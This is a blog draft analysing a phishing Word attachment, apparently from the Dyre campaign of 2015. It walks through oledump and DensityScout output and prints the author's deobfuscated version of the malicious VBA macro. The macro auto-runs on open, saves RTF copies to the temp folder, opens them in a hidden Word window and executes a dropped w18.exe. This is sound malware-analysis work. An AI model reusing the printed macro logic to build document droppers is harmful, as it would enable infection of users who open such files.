Secure DOC Email Malware
draft post, needs more links and images
I spent a few pleasant hours today puzzling over a malware sample I received in email this week. Attached to a message from a bank I don’t do any business with was a Word document whose contents proclaim it holds an important secret message that can only seen if macros are enabled. I was hooked .. for the malware undoubtedly within !
Along the way I found about and devoured a video workshop from Didier Stevens, who makes the tools I was using. So, allow me to plug his firm DSL and the first malicious documents workshop .
ETA 16 Nov Lots of very smart people did analysis on other samples from this campaign. I read some really good stuff about it later on a closed list, and then these are public:
- https://www.proofpoint.com/us/dyre-malware-campaigners-innovate-distribution-techniques
- http://phishme.com/macro-documents-with-xor-encoded-payloads/
Background
DSL’s oledump tool was very helpful in digging into the file. In fact I was fighting with the random variable names of the macro code for awhile before I thought to hash and lookup my sample. Here are those links:
Virustotal detection rate is pretty good now. I got my sample in the mail Wednesday 21 Oct. VT analysis
The public Cuckoo Sandbox instance at Malwr has some good details, including some dropped files info in their results
This MyOnlineSecurity post describes the campaign and related risks, and includes some screenshots of the doc as opened in MS Office.
surface
$ ls -lh Secure\ Message.doc
-rw-r--r-- 1 adric adric 73K Oct 21 13:08 Secure Message.doc
$ md5sum Secure\ Message.doc
e801337581de7c8b4e887a3f8f0944b3 Secure Message.doc
$ file Secure\ Message.doc
Secure Message.doc: Composite Document File V2 Document, Little Endian,
Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm,
Revision Number: 1, Name of Creating Application: Microsoft Office Word,
Create Time/Date: Wed Oct 21 21:12:00 2015, Last Saved Time/Date:
Wed Oct 21 17:23:00 2015, Number of Pages: 1, Number of Words: 535,
Number of Characters: 3051, Security: 0
$ gstat Secure\ Message.doc
File: âSecure Message.docâ
Size: 74752 Blocks: 152 IO Block: 4096 regular file
Device: 1000002h/16777218d Inode: 94755058 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 502/ adric) Gid: ( 20/ staff)
Access: 2015-10-23 19:25:30.000000000 -0400
Modify: 2015-10-21 13:08:31.000000000 -0400
Change: 2015-10-21 13:08:31.000000000 -0400
Birth: 2015-10-21 13:08:31.000000000 -0400
I did throw the sample at my local Cuckoo instance here in the home lab, but my victim virtual machine(s) don’t have winword (MS Office) so they couldn’t do anything with it.
oledump it
DSL tools are available from Didier’s [website] (http://blog.didierstevens.com/), are included in REMnux, and come with the workshop as well.
A basic run of the tool shows the sections of the Office file and call out the macros for us with an M for functional macro code:
$ /opt/remnux-didier/oledump.py Secure\ Message.doc
1: 121 '\x01CompObj'
2: 4096 '\x05DocumentSummaryInformation'
3: 4096 '\x05SummaryInformation'
4: 9365 '1Table'
5: 4096 'Data'
6: 440 'Macros/PROJECT'
7: 41 'Macros/PROJECTwm'
8: M 4797 'Macros/VBA/ThisDocument'
9: 2765 'Macros/VBA/_VBA_PROJECT'
10: 515 'Macros/VBA/dir'
11: 205 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Item'
12: 341 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Properties'
13: 37482 'WordDocument'
We can isolate, decompress and export a stream like so:
/opt/remnux-didier/oledump.py -s 8 -v "Secure Message.doc" > macro
This macro is obfuscated a couple ways, including all of the variable and function names being noisy goo and some use of extra variables and concatenation. Here are a few lines, slightly altered as example:
Sub AutoOpen()
YQGDJHASDB = "q,jwdlk XXXXXXXXXXX jkgasjkdhwqdasd"
Auto_Open
End Sub
Sub Ljqhdsd()
KAHDJKASND = "askdhjk ashdjk asghXXXXXXXXXXXX"
Subipose
End Sub
I fussed over the code of this macro for quite awhile renaming things to make some sense of it. Here’s my version:
## main for Word
Sub AutoOpen()
varY = "q,jwdlk XXXXXXXXXXXXXXXX jkgasjkdhwqdasd"
Auto_Open ##run main for Excel
End Sub
## orphan?
Sub LK()
varK = "askdhjk ashdjk asghXXXXXXXXXXXX"
main
End Sub
Sub main()
slash = "\"
Temp = "TEMP"
On Error Resume Next
TMP = Environ$(Temp) & slash
FEFE = ".e"
FEFE = FEFE & "xe"
DEDE = "." + "rt" + "f"
TCA = TMP + "322" + DEDE
## $TEMP\322.rtf
TCB = TMP + "311" + DEDE
## $TEMP\311.rtf
TEX = TMP + "w18" & "" + FEFE
## $TEMP\w18.exe
## save RTFs to disk
SaveFile (TCA)
SaveFile (TCB)
## sleep?
Sleep (2)
## Run Word
Set wordObj = CreateObject("Word.Application")
wordObj.Visible = False
Set frame = wordObj.Documents.Open(TCA)
## create another Word window with 322.rtf, hide it
## sleep and then exec
Sleep (2)
Shell (TEX)
## run $Temp\w18.exe
Sleep (1)
## stop other Word
wordObj.Quit
Set wordObj = Nothing
## kill Word
End Sub
## for Excel
Sub Workbook_Open()
varX = "ansdh XXXXXXXXXXXXXXXX d"
main
End Sub
## Sleep == sleep(secs)?
Sub Sleep(duration As Long)
Dim Counter As Long
Counter = Timer + duration
Do While Timer < Counter
DoEvents
Loop
End Sub
## Save File As RTF?
Public Function SaveFile(Name As String)
ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
##main for Excel
Sub Auto_Open()
main
varB = "qkwdhj XXXXXXXXXXXXXXXXd"
End Sub
What I think it does: when the document is opened in Word or Excel it auto executes the main function to save the document to disk into temp files using Word to convert to RTF, twice ( $TEMP\322.rtf , $TEMP\311.rtf ). Another hidden Word window is opened to one of the those files ( $TEMP\322.rtf ) and used to execute a third file ( $TEMP\w18.exe ).
Checking back with the dynamic analysis from Malwr we see the 311 and 322 files drop, along with some other possible dropped files. 311 and 322 are slightly different sizes, but 10 time larger than our specimen at 771826, 771821 bytes. A third large file in Malwr is office.odf with is ~2.3 MB . VirusTotal for that indicate that it is a signed part of MS Office: “ Microsoft Office culture data dll” so that may be an artifact of the sandbox that isn’t relevant to the malware activity.
I think Malwr’s system wasn’t vulnerable so they didn’t get the payload. My hypothesis is that something in the Office doc can exploit Word when it is written out as and then read in as RTF.
content
The Word DOC contents include a note about a encrypted message ( “A message is encrypted by RSA key.” ) and an impressive looking block of noise marked as RSA encrypted and delimited by “—–RSA PROTECTED BLOCK—–” markers.
I pulled out the data block with oledump and trimmed with vi:
/opt/remnux-didier/oledump.py -s13 --cut '0x900:0x15c0' -d Secure\ Message.doc > q; vi q
I can’t make anything out if it yet, despite trying a few basic decoding tricks. It’s pretty random, according to CHI-squared analysis with DensityScout (in REMnux):
$ densityscout -m CHI q
DensityScout (Build 43)
by Christian Wojner
Calculating density for file ...
(Density) | Filename
--------------------------------------------------------------
(42.4244) | q
Maybe it really is encrypted, with a RSA cipher, and some of the noise in the macro is key material?